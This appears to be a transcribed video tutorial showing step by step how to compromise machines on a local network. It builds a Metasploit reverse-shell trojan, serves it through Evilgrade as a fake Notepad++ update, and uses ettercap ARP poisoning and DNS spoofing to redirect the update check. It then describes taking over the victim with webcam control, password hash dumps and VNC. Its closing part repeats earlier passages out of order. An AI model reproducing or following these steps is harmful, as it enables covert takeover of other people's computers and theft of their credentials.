Hey everybody, today we're going to be using an awesome tool called Evilgrade, and we're going to be using it with Metasploit to set up a really good attack. This is a really fun thing to do. You should get a kick out of it. Anyway, you'll need Metasploit skills, you'll need to know DNS spoofing, which I have videos of both of those, and then you're going to need what we learn here with Evilgrade. Basically, Evilgrade lets us take programs on other computers that need to be updated. We can spoof our DNS to push an update to them, so when their software comes up and says, this software can be updated, they're really downloading what we want them to download. So let's go ahead and do that. First off, what we're going to have to do, we have to make a payload with Metasploit. Alright, so if you've watched my videos, you know how to do this. We're going to make a little standalone executable. We'll use an interpreter backdoor, and we'll use reverse TCP in case there's a firewall. The L host has to be us, so I am 192.168.95.132, and then L port, let's just use 4444. We're going to put an X because we want an executable, and then we're going to redirect it into into a file. I don't know, let's just call it trojan.exe. So that's making our standalone executable, and this is what we're going to serve up. We're going to try and make other computers download this that are on our network, obviously. So the next thing we're going to do is, now that we have that created, if I do an ls, sure enough, it's right there. So let's open Evilgrade. So to do that, you're going to, well, you can go into the directory if you want. It's under, on backtrack, it's under pentest, exploit, ISR, Evilgrade. Alright, so there it is. We'll just run it, /Evilgrade. And if you'll notice, these are all the different tools we can attack, okay? You're going to see some popular ones here, okay? You could go after iTunes, you can go after, any of these. FileZilla, another popular one, Trillion. We even have Skype, popular one there. CC Cleaner, another popular one. Mac updates, okay? I can't exactly see it, but I know it's in there. And then even Windows updates, okay? So when your computer pops up, down in the bottom right corner it says Windows has updates, and you just click install. You might not be installing Windows updates. You might be installing someone else's file from across the network. That could just be a deadly Trojan or virus. I'm going to explain this a little bit later, but don't worry, it doesn't mean just because you're on a network you could be exposed. Programs tend to patch after they realize Evilgrade has added them. Okay, but anyway, so what we're going to do is what we're going to go after, I happen to know on the other computer I'm attacking, is running Notepad++. Okay, so I'm going to type in configure Notepad+. Alright, you see I got this little prompt down here. Now I can say show options. Alright, so this is the agent I'm using. By default, I think it's some kind of netcat listener, some type like that, maybe something similar to that. But I don't want to use that. I want to use... the agent is what we want them to download. So in this case, we want them to download our Trojan. So watch closely, because this is kind of a weird syntax to set an agent. But we're gonna go set agent, and then you're gonna do apostrophe bracket quote gator %out% close the gator, and then you're gonna put the wherever your file's saved at. Mine's in the home of root, and then it's called trojan.exe, and then you're going to do another gator %out another gator quote bracket apostrophe. Alright, I know it's kind of weird. I don't exactly know why it's like that. They'll probably fix it later on, but so we're setting our agent. Doesn't appear to have thrown an error or anything. Hopefully it won't later either. So that's kind of all set up. We need to type start to get it going, but we're not going to do that just yet because there's a few other things we have to do. Okay, so over here I'm going to go ahead and start Metasploit. We'll let that load up. And then over here, okay, so I said that DNS spoofing is going to be involved. Again, if you don't know what that is or how it works, go watch my other video on pranking the network DNS spoofing, because you'll need to know it to really understand how exactly this is working. So, what we need to take, this says virtual host, notepadplus.sourceforge.net. And what this is doing is Notepad++, I'm getting Facebooked like crazy right now. Sorry about that. Virtual host equals this. Okay, Notepad++. This is where Notepad++ looks when it wants to see if it can download an update. So we're going to spoof this to be our IP address, and then their computer will be looking at ours when it wants an update. So we'll copy that, and now we need to put that in our ethercap tool. Alright, so I can type locate. There's a file called ether.dns that lets us redirect IP addresses, okay? And it's that top one there. So I'm going to pico user local share ethercap ether.dns. And we're going to come down here where it says all these Microsoft addresses, alright? We're going to add in this virtual host. Alright? And then we're going to add, say it's an A record, and we're going to put our IP address. 92.95.132. Okay, so we're saying redirect this DNS address, the A record, to our IP address. So whenever anything on our network goes to look here, it's going to look at us instead. Evilgrade works by hosting a small little web server with the file. Okay, so if you have an Apache server or something else open, make sure you close it before you start Evilgrade. Okay, so I'm going to hit Control X to save. Say yes. Yeah, okay, we're good. So from there, last step is to, well, we got a couple of steps left. We're going to start a listener, because we set up our Trojan. Now we have to set up something to listen for when it dials back to us. So we're going to say use exploit multi-handler. We're going to set the payload to what we specified, which was Windows, Meterpreter, reverse TCP. Set the L host, that was us, which was 192.168.95.132. Let's hit show options, make sure I set everything. Port's already specified, it's the default. And so I'll say exploit, and that's just going to listen for when something dials back. Alright, so lastly I need to start my man-in-the-middle attack to spoof DNS, which is going to be with ethercap. We're going to say text mode, we're going to say be quiet about it, and I'm going to say man in the middle with ARP, and then let's see, we're going to do the plugin DNS, which is going to be DNS spoof, and then the IPs we want to attack, which in this case I'm going to put it between my gateway, and then I'll just do all the other IP addresses. If you only want to attack one person, you put them inside these brackets. One other person, you put them inside those brackets. And that should be working. So I'll say go. Alright, looks like everything worked correctly. Okay, DNS is being spoofed. Activating DNS spoof. Okay, so now we should be good to go ahead and say start on this. So, what we have here, web server waiting for connections, DNS server waiting for connections. Looks like everything's working alright. So let's go to our other virtual machine and open Notepad++. I'm going to kind of leave backtrack over here on the side so you can see what's going on. So let's see, let's click start, and we'll go to Notepad++. Very good. And update Notepad++. Okay. If we wait long enough, it might pop up by itself. It might be, you know. But anyway, we'll hit update. As you can see, we got a little spoof here, and then we got some stuff going on over here, and it says an update package is available. Do you want to download it? And of course I do. As a user, I want the latest and greatest stuff, right? So we got some action going on over here on the left. You'll see, making some talk. Alright, so it appears that everything is ran and we have updated Trojan.exe. So it says I got to close it in order to continue. Say yes. I close it. Nothing happens. As a user, I'm a little devastated, but I don't think anything of it. So we'll go back to backtrack. And as you'll notice, we now have a interpreter session right here. If you want to know the damage you can do, watch my other videos. Like I said, we can take control of the webcam. We can do, a hash dump. I'll get some passwords. Record the mic. We can do all sorts of stuff now. If I want VNC, just type in run VNC. Wait a couple seconds, and I will have mouse and keyboard access to that computer. And I can just go on about my way. VNC access. There it is. Yay! So, there you have it. That's Evilgrade. So the thing about Evilgrade is it's not just going to work every time. Basically, like I said, after a company realizes that their computer, or that their software is vulnerable to Evilgrade, they're going to use a certificate when they actually do updates. And that's kind of the goal of Evilgrade, is to get these companies to realize, hey, this isn't secure at all. What's the matter with you? So anyway, that's Evilgrade. Hope you enjoyed this. Hope you learned something. Yeah, please don't use this for evil, as always, right? I'm just doing this for the sake of teaching, and I hope you like learning. So subscribe to my videos, and thanks for watching. Anyway, you'll need Metasploit skills, you'll need to know DNS spoofing, which I have videos of both of those, and then you're going to need what we learn here with Evilgrade. Basically, Evilgrade lets us take programs on other computers that need to be updated. We can spoof our DNS. We have to make a payload with Metasploit, alright? So, if you've watched my videos, you know how to do this. We're going to make a little standalone executable. We'll use a interpreter backdoor, and we'll use reverse TCP in case there's a firewall. Hey everybody, today we're going to be using an awesome tool called Evilgrade, and we're going to be using it with Metasploit to set up a really good attack. This is a really fun thing to do. You should get a kick out of it. DNS to push an update to them, so when their software comes up and says, this software can be updated, they're really downloading what we want them to download. So let's go ahead and do that. First off, what we're going to have to do, file host has to be us. So I am 192.168.95.132. And then L port, let's just use 4444.